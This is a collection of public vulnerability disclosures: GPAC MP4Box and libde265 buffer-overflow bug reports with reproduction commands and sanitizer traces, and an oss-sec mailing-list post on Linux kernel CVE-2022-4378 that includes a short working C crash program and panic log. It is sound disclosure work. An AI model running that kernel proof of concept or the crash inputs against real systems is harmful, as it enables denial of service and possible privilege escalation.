      0x0c2a7fffa8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c2a7fffa8f0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==745696==ABORTING
    

if compile without ASAN and run the same poc

    ./configure --static-bin
    make
    ./MP4Box import -catx poc_bof14.mp4
    

The crash will happen at another place

    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16962257
    [AVC|H264] Error parsing NAL unit type 7
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 16 size error (45 but 7 remain), keeping full SEI untouched
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 32527
    [AVC|H264] Error parsing NAL unit type 7
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16964897
    [AVC|H264] Error parsing NAL unit type 7
    [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team!
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 63
    [AVC|H264] Error parsing NAL unit type 7
    [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team!
    realloc(): invalid next size
    Aborted
    

realloc(): invalid next size indicates that there was a bof on heap indeed, overwriting the size field of a heap chunk.

**POC**

poc\_bof14.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47661: heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes · Issue #2358 · gpac/gpac

Libde265 1.0.9 is vulnerable to Buffer Overflow in function void put_qpel_fallback<unsigned short>

**Description**

stack-buffer-overflow (libde265/build/libde265/libde265.so+0x17d304) in void put\_qpel\_fallback(short\*, long, unsigned short const\*, long, int, int, short\*, int, int, int)

**Version info**

     dec265  v1.0.9
    --------------
    usage: dec265 [options] videofile.bin
    The video file must be a raw bitstream, or a stream with NAL units (option -n).
    
    options:
      -q, --quiet       do not show decoded image
      -t, --threads N   set number of worker threads (0 - no threading)
      -c, --check-hash  perform hash check
      -n, --nal         input is a stream with 4-byte length prefixed NAL units
      -f, --frames N    set number of frames to process
      -o, --output      write YUV reconstruction
      -d, --dump        dump headers
      -0, --noaccel     do not use any accelerated code (SSE)
      -v, --verbose     increase verbosity level (up to 3 times)
      -L, --no-logging  disable logging
      -B, --write-bytestream FILENAME  write raw bytestream (from NAL input)
      -m, --measure YUV compute PSNRs relative to reference YUV
      -T, --highest-TID select highest temporal sublayer to decode
          --disable-deblocking   disable deblocking filter
          --disable-sao          disable sample-adaptive offset filter
      -h, --help        show help
    

**Reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    mkdir build
    cd build
    cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
    make -j$(nproc)
    ./dec265/dec265 poc.bin
    

**ASAN**

    WARNING: coded parameter out of range
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    =================================================================
    ==3829==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffea52d35f at pc 0x7f8966bd5305 bp 0x7fffea52ac00 sp 0x7fffea52abf0
    READ of size 2 at 0x7fffea52d35f thread T0
        #0 0x7f8966bd5304 in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x17d304)
        #1 0x7f8966bd08c2 in put_qpel_1_0_fallback_16(short*, long, unsigned short const*, long, int, int, short*, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1788c2)
        #2 0x7f8966c0152e in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a952e)
        #3 0x7f8966c02c0f in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aac0f)
        #4 0x7f8966bf3a8b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x19ba8b)
        #5 0x7f8966c00a2e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a8a2e)
        #6 0x7f8966c3dd2a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e5d2a)
        #7 0x7f8966c3f774 in read_coding_unit(thread_context*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e7774)
        #8 0x7f8966c40762 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8762)
        #9 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #10 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #11 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #12 0x7f8966c37d49 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfd49)
        #13 0x7f8966c40f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
        #14 0x7f8966c42c3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
        #15 0x7f8966b95e6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
        #16 0x7f8966b96673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
        #17 0x7f8966b95311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
        #18 0x7f8966b9505b in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d05b)
        #19 0x7f8966b97be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #20 0x7f8966b9824c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #21 0x7f8966b7e3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #22 0x562ac9c989a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #23 0x7f8966526d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #24 0x7f8966526e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #25 0x562ac9c967c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
    
    Address 0x7fffea52d35f is located in stack of thread T0 at offset 9391 in frame
        #0 0x7f8966c02203 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aa203)
    
      This frame has 2 object(s):
        [48, 9136) 'mcbuffer' (line 71)
        [9392, 15072) 'padbuf' (line 129) <== Memory access at offset 9391 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x17d304) in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int)
    Shadow bytes around the buggy address:
      0x10007d49da10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da40: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2
      0x10007d49da50: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
    =>0x10007d49da60: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2[f2]00 00 00 00
      0x10007d49da70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49daa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49dab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3829==ABORTING
    

**POC**

poc.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47655: Another stack-buffer-overflow in function void put_qpel_fallback<unsigned short> · Issue #367 · strukturag/libde265

A stack overflow flaw was found in the Linux kernel's SYSCTL subsystem in how a user changes certain kernel parameters and variables. This flaw allows a local user to crash or potentially escalate their privileges on the system.

**oss-sec mailing list archives**

_From_: Kyle Zeng <zengyhkyle () gmail com>  
_Date_: Fri, 9 Dec 2022 09:11:25 -0700  

Hi there,

I recently found a stack-based buffer overflow in the Linux kernel,
which can cause DOS and is potentially exploitable. This bug affects
the following kernel versions: latest, 6.0, 5.15, 5.10, 5.4, 4.19,
4.14, and 4.9. I already contacted security () kernel org and helped them
patch the vulnerable kernel versions.

# Vulnerability
The vulnerability is caused by a missing check on user input. More
specifically, \_\_do\_proc\_dointvec function has the following snippet:
~~~
if (write) {
    ......
    if (left > PAGE\_SIZE - 1)
        left = PAGE\_SIZE - 1;
    p = buffer;
}
......
if (write) {
    left -= proc\_skip\_spaces(&p);
~~~
In this snippet, \`buffer\` and \`p\` represent a buffer containing
user-supplied input and it can contain more than 1 page of data. It
first truncates user input to 1 page (by marking number of bytes
\`left\` as 1 page). However, in a later call to \`proc\_skip\_spaces\` (a
function that assumes the argument is a NULL-terminated string), it
forgets the "up to 1 page" limit, processes all user input, and
calculates how many leading spaces are there in the user input. In the
buffer contains more than 1 page of spaces, \`left\` will be set to a
negative value. The negative value will then be passed to
\`proc\_get\_long\` and the least significant 4 bytes will be used as
length for memcpy that copies data to kernel stack, causing
stack-based buffer overflow: (the check on \`len\` won't work because
\`len\` is signed)
~~~
static int proc\_get\_long(...)
{
    char tmp\[TMPBUFLEN\];
    int len = \*size;

    if (len > TMPBUFLEN - 1)
        len = TMPBUFLEN - 1;

    memcpy(tmp, \*buf, len);
    ......
}
~~~

# Patch
The patch consists of two parts:
1.  refactor \`proc\_skip\_spaces\`, instead of assuming the argument is a
NULL-terminated string, it now will process data up to a limit. The
patch can be found here:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bce9332220bd677d83b19d21502776ad555a0e73
2. fix the signness issue in \`len\`:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e6cfaf34be9fcd1a8285a294e18986bfc41a409c

# Trigger
The bug is triggerable by non-root users if they have access to
user-namespace. A proof-of-concept crash program that causes kernel
panic is attached. To run the POC, you need net namespace. In other
words, you can trigger the bug using the following command: \`unshare
-rn\` and then \`./poc\`.

Best,
Kyle Zeng

===========================================
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
{
    int fd = open("/proc/sys/net/ipv4/tcp\_rmem", O\_WRONLY);
    void \*a = mmap(NULL, 0x2000, PROT\_READ|PROT\_WRITE,
MAP\_ANON|MAP\_PRIVATE, -1, 0);
    memset(a, '\\x09', 0x2000);
    write(fd, a, 0x2000);
    return 0;
}
============================================
\[    7.150435\] BUG: stack guard page was hit at 00000000eea91c87
(stack is 00000000fdd90d6b..000000009d81213d)
\[    7.152330\] kernel stack overflow (page fault): 0000 \[#1\] SMP NOPTI
\[    7.153467\] CPU: 3 PID: 476 Comm: poc Not tainted 5.10.157 #37
\[    7.154815\] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.15.0-1 04/01/2014
\[    7.156633\] RIP: 0010:memcpy\_erms+0x6/0x10
\[    7.157118\] Code: cc cc cc cc eb 1e 0f 1f 00 48 89 f8 48 89 d1 48
c1 e9 03 83 e2 07 f3 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8
48 89 d1 <f3> a4 c3 0f 1f 80 00 00 00 00 48 89 f8 48 83 fa 20 72 7e 40
38 fe
\[    7.158177\] RSP: 0018:ffffc90000823c68 EFLAGS: 00010282
\[    7.158488\] RAX: ffffc90000823ca0 RBX: ffffffffffffefff RCX: ffffffffffffec9f
\[    7.158932\] RDX: ffffffffffffefff RSI: ffff888007d7e360 RDI: ffffc90000824000
\[    7.159347\] RBP: ffffc90000823d00 R08: ffffffff824158b3 R09: 0000000000000000
\[    7.159802\] R10: ffffc90000823eb8 R11: ffffffff810fb290 R12: ffffc90000823d58
\[    7.160201\] R13: ffffc90000823d47 R14: ffffc90000823ca0 R15: ffffffffffffefff
\[    7.160603\] FS:  0000000001a533c0(0000) GS:ffff88803ed80000(0000)
knlGS:0000000000000000
\[    7.161053\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[    7.161373\] CR2: ffffc90000824000 CR3: 0000000007f3e006 CR4: 0000000000770ee0
\[    7.161769\] PKRU: 55555554
\[    7.161924\] Call Trace:
\[    7.162076\]  proc\_get\_long+0x90/0x190
\[    7.162286\] Modules linked in:
\[    7.162463\] ---\[ end trace d4a913b02029fee9 \]---
\[    7.162722\] RIP: 0010:memcpy\_erms+0x6/0x10
\[    7.162952\] Code: cc cc cc cc eb 1e 0f 1f 00 48 89 f8 48 89 d1 48
c1 e9 03 83 e2 07 f3 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8
48 89 d1 <f3> a4 c3 0f 1f 80 00 00 00 00 48 89 f8 48 83 fa 20 72 7e 40
38 fe
\[    7.164044\] RSP: 0018:ffffc90000823c68 EFLAGS: 00010282
\[    7.164370\] RAX: ffffc90000823ca0 RBX: ffffffffffffefff RCX: ffffffffffffec9f
\[    7.164780\] RDX: ffffffffffffefff RSI: ffff888007d7e360 RDI: ffffc90000824000
\[    7.165188\] RBP: ffffc90000823d00 R08: ffffffff824158b3 R09: 0000000000000000
\[    7.165595\] R10: ffffc90000823eb8 R11: ffffffff810fb290 R12: ffffc90000823d58
\[    7.166002\] R13: ffffc90000823d47 R14: ffffc90000823ca0 R15: ffffffffffffefff
\[    7.166431\] FS:  0000000001a533c0(0000) GS:ffff88803ed80000(0000)
knlGS:0000000000000000
\[    7.166889\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[    7.167218\] CR2: ffffc90000824000 CR3: 0000000007f3e006 CR4: 0000000000770ee0
\[    7.167661\] PKRU: 55555554
\[    7.167820\] Kernel panic - not syncing: Fatal exception
\[    7.168333\] Kernel Offset: disabled
\[    7.168544\] Rebooting in 1000 seconds..

**Current thread:**

*   **CVE-2022-4378: Linux kernel stack-based buffer overflow** _Kyle Zeng (Dec 09)_

CVE-2022-4378: Linux kernel stack-based buffer overflow

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow via gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_vvc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c

for (i=0; i<sps\_rpl1\_same\_as\_rpl0; i++) {
  u32 j;
  sps->num\_ref\_pic\_lists\[i\] = gf\_bs\_read\_ue\_log\_idx(bs, "sps\_num\_ref\_pic\_lists", i);
  for (j=0; j<sps->num\_ref\_pic\_lists\[i\]; j++) {
	  s32 res = vvc\_parse\_ref\_pic\_list\_struct(bs, sps, i, j, &sps->rps\[i\]\[j\]); // when j == 64, overflow sps->rps
	  if (res<0) return res;
  }
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc.mp4
    

Crash reported by sanitizer

    [VVC] Warning: Error parsing NAL unit
    [Core] exp-golomb read failed, not enough bits in bitstream !
    media_tools/av_parsers.c:10710:71: runtime error: index 65 out of bounds for type 'VVC_RefPicList [64]'
    

**POC**

poc\_bof.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

xdchase

Tag

#buffer_overflow